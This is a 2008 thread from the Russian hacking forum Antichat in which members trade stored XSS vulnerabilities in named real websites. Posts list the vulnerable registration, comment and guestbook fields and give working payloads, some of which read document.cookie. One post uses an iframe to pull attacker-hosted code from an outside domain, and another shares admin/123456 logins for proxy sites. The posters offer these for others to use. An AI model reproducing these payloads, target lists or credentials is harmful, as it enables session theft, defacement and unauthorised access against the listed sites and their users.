ANTICHAT

ANTICHAT (https://forum.antichat.xyz/index.php)
-   Уязвимости (https://forum.antichat.xyz/forumdisplay.php?f=74)
-   -   Активные Xss (https://forum.antichat.xyz/showthread.php?t=35802)

DimOnOID 09.04.2008 01:00

:D Ты забыл про forum.auto.mail.ru
а вапще если немного посмотреть на домена мейла..то можно найти ещё парочку форумов :D

freddi 09.04.2008 09:33

DimOnOID, еще только на forum.horo.mail.ru, форумы игр и софта построенны на других движках и таких уязвимостей не имеют.

-=megahertz=- 14.04.2008 21:09

Интернет-магазин бытовой техники и электроники
http://www.003.ru/

При регистрации уязвимы поля Фамилия, Имя и Отчество
"<script><alert('xss by megahertz')</script>

echobyte 19.04.2008 01:04

инет магазин оружия
http://www.kortik.ru/

уязвимы комментарии

пример

xcedz 19.04.2008 03:31

[radikal.ru]


[заводим акк, загружаем картинку, а затем редактируем,
в поле Надпись на фото
вводим ядовитый код ]

">'></title><SCRIPT>alert(/хренкоми/)</SCRIPT>
-----------------------------

xcedz 19.04.2008 10:34

www.tnd.ru


регимся, затем редактируем свои данные

ну и соответственно внедряем код в следующие поля

http://i007.radikal.ru/0804/e3/5e981d1dd520.jpg

Grey 20.04.2008 14:24

Цитата:

Сообщение от freddi
mail.ru

http://forum.hi-tech.mail.ru/
уязвимо поле "Заголовок:"
всеравно скоро прикроют, так что выкладываю - играйтесь)

Цитата:

Сообщение от freddi
кстате и на forum.lady.mail.ru тоже работает)

Цитата:

Сообщение от freddi
DimOnOID, еще только на forum.horo.mail.ru, форумы игр и софта построенны на других движках и таких уязвимостей не имеют.

Еще здесь такой же форум и как следствие тут тоже активная xss в заголовке темы на форуме.

http://forum.deti.mail.ru/

iddqd 24.04.2008 16:42

[NoNaMe] nnm.ru

Идем в http://doci.nnm.ru/newdoc и создаем новый док.
Уязвимо поле "Название дока".

Shred 24.04.2008 19:04

Цитата:

Сообщение от iddqd
[NoNaMe] nnm.ru

Идем в http://doci.nnm.ru/newdoc и создаем новый док.
Уязвимо поле "Название дока".

во первых ограничение на 30 символов, во-вторых название локи <h1>doc</h1> отобразилось как есть :(

Doom123 26.04.2008 05:57

http://www.origitea.ru/default.aspx?404;http://www.origitea.ru:80/guest

Визде пишем <script>alert()</script>

Travka 28.04.2008 20:14

http://memori.ru
регаемся
в поле имя или фамилия пишем
<script>alert()</script>
смотрим профиль

xcedz 28.04.2008 20:20

www.33hochu.ru

Нашел вначале пассивную

Зарегался думаю может еще что есть интересненькое?

ГЫ, конечно есть, проходим несложную регистрацию, и в своем профайле создаем фотоальбом а в названии пишем наш код

например --></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>


можно так "><script>alert(document.cookie)</script>

еще можно раскрыть пути и пощупать на предмет (мусколь стопудова стоит) инжекции ;)

http://www.33hochu.ru/antixy

вот что получилось ))
все, работает и в опере и в лисе :)

echobyte 05.05.2008 19:02

www.pcweek.ru

уязвимы комментарии

пример http://www.pcweek.ru/themes/detail.php?ID=109663&THEME_ID=0&SPHERE_ID=?add-comment

xcedz 07.05.2008 19:28

хытитипи ввв.stroyazbuka.com/web/registration.php

так вот. регестрируемся в каталоге. в поле регион можно внедрить свой код ))

так же есть и пассивная. (говорю тока о xss ))) есть и другие темы ;) )

YoYo Factory 11.05.2008 11:08

/

Уязвима Регистрация
Ни одно поле не фильтруется

"><script>('XSS')</script>

N1K70 13.05.2008 11:42

хсс в модуле, после http://www.asapmachineco.com/index.php?module=ath&banner=> можно прописать любую команду... ну юзайте короче )))
Код:

http://www.asapmachineco.com/index.php?module=ath&banner=><a href=http://for-hack.ru>N1K70_SITE</a><script>alert(document.cookie)</script>

ДеЦл 13.05.2008 15:53

ИдиВЖопу.ру

Уязвимы поля "текст под картинкой" и "над картинкой"
Пример:

Цитата:

http://idi-v-zhopu.ru/?166
(с) Лигендо...

xcedz 13.05.2008 19:41

Заводи ак создаем вакансию. :p

http://www.jobportal.com.ua/vacancy/499117.html

(портфолио разработчика http://www.globalweb.kiev.ua/portfolio/)

М.Боярский 18.05.2008 13:58

Kanalia.ru - сайт обо мне!
в каментах галлереи не фильтруеццо имя отправителя
http://kanalia.ru/gallery/

echobyte 23.05.2008 00:05

Сиськи!
http://hahaha.com.ua/file/54.html

КВР 24.05.2008 21:57

_http://checkproxy.nnm.netserv.name/
admin
123456

_http://queen-love.com/proxy5/
admin
123456

Юзайте и не просите больше никого о халявных прокси.

echobyte 27.05.2008 22:42

http://www.panvasoft.com/rus/5452/gb/

sabe 30.05.2008 21:48

Chronicle.com - Деньги
Цитата:

/forums/index.php?board=[XSS]
/forums/index.php?topic=[XSS]

Kusto 31.05.2008 02:05

http://www.all-biz.info/ru/

при регистрации уязвимы пактически все поля(для активных XSS), вчастности поле "о предриятии", зарегиться до конца неудалось- за регу требют 35400 руб
ну а чтоб вам небыло скушно вот вам хоть и пассивная но тоже XSS)))
http://www.all-biz.info/ru/enterprises/?btn_search=1&findentry=%3Cscript%3Ealert%28%27%D0 %B1%D0%B0%D0%BC%D1%81%27%29%3C%2Fscript%3E&cs=&ac_ category=&btn_search=%D0%98%D1%81%D0%BA%D0%B0%D1%8 2%D1%8C

Buffalon 31.05.2008 16:15

http://o-sport.ru/guestbook/index.php

0Й... .Вводите в гостевой
<script>alert()</script>
и всё

D9D9_VAD9 01.06.2008 11:12

svadbann.ru

Гостевая книга
http://www.svadbann.ru/q_answer.html

Активны все три поля, сообщение, имя, мыло

echobyte 04.06.2008 19:58

http://classifieds.invictory.org
уязвимы обьявления

otmorozok428 08.06.2008 12:55

Сайт Российских Сутенёров

http://www.suter.ru/blacklist.html

POST-форма, поле "Дополнительно:
(краткое описание происшетшего)"


Цитата:

<script>alert("Сайт закрыт за нарушение действующего законодательства Российской Федерации")</script>

fatalo 09.06.2008 18:15

karaul.ru/
Xss найдена в добавление комментария.
Вот пример:
Код HTML:

_http://karaul.ru/30.12.2004/13/comments
_http://karaul.ru/09.06.2008/11/comments

В поле имя вводите стандартное:
PHP код:

<script>alert('antichat.ru')</script

И получаете желаемое!Хочу сказать,что караул.ру является довольно посещаемым ресурсом.

fatalo 10.06.2008 14:45

www.skisport.ru
Оффициальный сайт журанала лыжный спорт.
Пример скрипта:
Код HTML:

http://www.skisport.ru/search/index.php?search=%3Cscript%3Ealert%28%27fatalo+for+antichat.ru%27%29%3C%2Fscript%3E&days=&dts=&dte=
У этого ресурса бажная функция поиска по сайту.
Как обычно пишем:
PHP код:

<script>alert('antichat.ru want you!')</script

И творим добро =)

xcedz 10.06.2008 18:10

fidep.ru
http://www.idiot.fidep.ru все просто.

MaSTeR GэN 10.06.2008 23:11

Цитата:

Сообщение от xcedz
=\ за разделом никто не следит так как они на фик никому не нужны :D к статит это пассивные.
Еманыйрот!

А зря может кто нить научился бы xss различать ;)
vkadre.ru
собственно тыкая создать добавить ролик вбиваем имя
Код:

</title><script>alert(/xss/)</script>
+
cобственно канает любой тег главное title закрыть ;)

вотс уже рабочий линк
http://vkadre.ru/users/1926899

Кто хорошо подумает может на самом контакте активку найти ;)

xcedz 11.06.2008 22:02

И снова я

http://www.internetpro.ru/boards/index.php

добавим пару объяв о продаже мопедов? )))))))))

xcedz 11.06.2008 22:21

http://majordomo.ru/constructor/
Заходим на тестовый акк, удаляется через 20 минут )))

http://iloveru.net/
трут быстро =)

MaSTeR GэN 11.06.2008 22:48

вообшем то сайт ру подкастинга ;)
rpod.ru

собсвенно уязвимо поле коменнентов т,е заходим выбириаем группу тему и оставляем коммент
Код:

<iframe src="http://blabla.ru/index.html" <
ну и собственно создаем на домене blabla.ru index.html
c нужным кодом )
рабочий пример с фреймом на гугль.ru )
http://siski-piski-show.rpod.ru/82.html#c110876

xcedz 12.06.2008 15:04

price.ua
завдоми ак,
поле фио.
усё. =)

Лайт 13.06.2008 03:53

Тока что нашел одну ХСС у себя на форуме на mybb.ru, наверно баян, но все же.
В профиле есть вкладка "остальное", в админке можно разрешить пользователям заполнять ее.

Пишем <script>alert()</script> и вуаля. А дальше ищите дурака админа, который разрешил эти поля.
Проблема в длинне. Максимум на серве 999 символов, а там, кто как поставит.

xcedz 14.06.2008 02:02

ловите позитффф

http://blog.meta.ua блоги ;)

как вариант, создаем свое сообщество

http://contact.meta.ua


вообщем есть над чем поразмыслить =\

Лайт 15.06.2008 00:08

Нашел уязвимость на www.playground.ru
Жмем регистрация и вставляем <script>alert()</script>
Уязвимые поля:
Конфигурация компьютера
Ваш сайт
О себе

Вот моя рега http://users.playground.ru/448520/

Ded MustD!e 15.06.2008 07:46

Журнал Total Football

http://www.totalfootball.ru

Добавляем комментарий к новости, уязвимы все поля :p

Также присутствует пассивка в поиске, и если поискать sql-inj ;)


Время: 03:56